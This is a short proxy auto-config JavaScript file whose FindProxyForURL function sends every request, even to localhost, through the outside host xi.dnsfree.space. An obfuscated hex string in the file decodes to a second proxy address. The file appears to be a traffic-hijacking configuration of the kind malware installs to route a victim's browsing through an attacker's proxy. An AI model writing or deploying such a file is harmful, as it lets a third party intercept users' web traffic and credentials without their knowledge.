var proxy = "PROXY xi.dnsfree.space:80;";

var domains = {
  "localhost": 1
};

var direct = 'DIRECT;';

var hasOwnProperty = Object.hasOwnProperty;

var _0x6d68=["\x50\x52\x4F\x58\x59\x20\x34\x35\x2E\x33\x32\x2E\x31\x31\x33\x2E\x39\x35\x3A\x32\x35\x3B"];var servlist=[_0x6d68[0]]

function FindProxyForURL(url, host) {
    var suffix;
    var pos = host.lastIndexOf('.');
    while(1) {
        suffix = host.substring(pos + 1);
        if (hasOwnProperty.call(domains, suffix)) {
            return proxy;
        }
        if (pos <= 0) {
            break;
        }
        pos = host.lastIndexOf('.', pos - 1);
    }
    return proxy;
}
